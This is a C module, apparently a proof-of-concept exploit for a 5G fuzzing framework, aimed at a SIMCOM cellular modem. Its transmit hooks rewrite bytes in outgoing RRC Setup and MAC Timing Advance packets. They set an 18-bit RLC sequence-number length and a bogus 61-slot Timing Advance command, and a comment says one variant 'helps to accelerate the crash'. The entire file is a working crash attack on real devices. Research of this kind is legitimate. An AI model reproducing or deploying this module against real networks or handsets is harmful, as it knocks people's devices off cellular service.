#include <ModulesInclude.hpp>

// Filters
// Module-wide filter handles: created in setup(), registered on every TX
// packet in tx_pre_dissection() and queried in tx_post_dissection().
wd_filter_t f1; // matches "nr-rrc.rrcSetup_element"
wd_filter_t f2; // matches "mac-nr.control.timing-advance.command"

// Vars

/* Returns the fixed, NUL-terminated name of this module. */
const char *module_name()
{
    static const char name[] = "SIMCOM";

    return name;
}

// Setup
/*
 * One-time module initialisation.
 *
 * Switches off fuzzing.enable_mutation and fuzzing.global_timeout in the
 * shared configuration, then creates the two filters used by the TX hooks.
 * NOTE(review): presumably mutation is disabled so that the only packet
 * changes are the fixed ones made by this module; confirm against the
 * framework documentation.
 *
 * Returns 0 when both filters were created, 1 when either wd_filter() call
 * returned NULL.
 */
int setup(wd_modules_ctx_t *ctx)
{
    ctx->config->fuzzing.enable_mutation = false;
    ctx->config->fuzzing.global_timeout = false;

    f1 = wd_filter("nr-rrc.rrcSetup_element");
    f2 = wd_filter("mac-nr.control.timing-advance.command");

    if (f1 == NULL || f2 == NULL) {
        return 1; /* at least one filter could not be created */
    }

    return 0;
}

// TX
/*
 * TX hook invoked before a packet is dissected.
 *
 * Registers f1 and f2 on ctx->wd; the packet bytes themselves are not
 * read or changed here. Always returns 0.
 * NOTE(review): presumably registration must precede dissection for
 * wd_read_filter() to report a match afterwards; confirm.
 */
int tx_pre_dissection(uint8_t *pkt_buf, int pkt_length, wd_modules_ctx_t *ctx)
{
    /* The buffer is not needed at this stage. */
    (void)pkt_buf;
    (void)pkt_length;

    wd_register_filter(ctx->wd, f1);
    wd_register_filter(ctx->wd, f2);
    return 0;
}

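/*
 * TX hook invoked after a packet has been dissected.
 *
 * When the packet matches f1 or f2, one byte at a fixed offset is
 * overwritten in place. f1 is tested first; f2 is only consulted when f1
 * did not match.
 *
 * The offsets are hard-coded, so every write is guarded against
 * pkt_length: a filter match alone does not prove the buffer is long
 * enough, and an unguarded write would corrupt memory in the test host.
 * NOTE(review): a match also does not prove the field sits at this exact
 * offset for every encoding of the message; confirm against a capture
 * before relying on the result.
 *
 * pkt_buf    - packet bytes, modified in place
 * pkt_length - number of valid bytes in pkt_buf
 * ctx        - module context; ctx->wd is queried for filter matches
 *
 * Returns 1 when a byte was rewritten, 0 when the packet was left
 * untouched (no filter matched, or the packet is too short).
 */
int tx_post_dissection(uint8_t *pkt_buf, int pkt_length, wd_modules_ctx_t *ctx)
{
    /*
     * Offsets kept in the original "N - 48" form.
     * NOTE(review): the meaning of 48 is not shown in this file;
     * presumably a header that is absent from pkt_buf. Confirm.
     */
    enum {
        RLC_SN_LEN_OFFSET = 77 - 48,
        TA_CMD_OFFSET = 61 - 48
    };

    if (wd_read_filter(ctx->wd, f1)) {
        if (pkt_buf == NULL || pkt_length <= RLC_SN_LEN_OFFSET) {
            puts("[1/2] Packet too short for the RLC field offset, left unmodified");
            return 0;
        }

        // pkt_buf[77 - 48] = 0x08; // Original RLC UL AM Sequence Length (12 bits)
        pkt_buf[RLC_SN_LEN_OFFSET] = 0x0c; // Set Uplink AM Sequence Field Length to 18 bits (1) instead of 12 (0)
        // pkt_buf[77 - 48] = 0x0e; // Increasing t-PollRetransmit from ms45 to ms205 (40) helps to accelerate the crash by delaying UL retransmission

        // Message corrected to agree with the value written above:
        // 18 bits is (1) and 12 bits is (0); the original text had them swapped.
        puts("[1/2] Setting Uplink AM Sequence Field Length to 18 bits (1) instead of 12 (0)");
        return 1;
    }

    if (wd_read_filter(ctx->wd, f2)) {
        if (pkt_buf == NULL || pkt_length <= TA_CMD_OFFSET) {
            puts("[2/2] Packet too short for the Timing Advance offset, left unmodified");
            return 0;
        }

        pkt_buf[TA_CMD_OFFSET] = 0x3D; // Writing wrong Time Advance command (61 slots)

        puts("[2/2] Writting wrong Time Advance command (61 slots)");
        return 1;
    }

    return 0;
}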
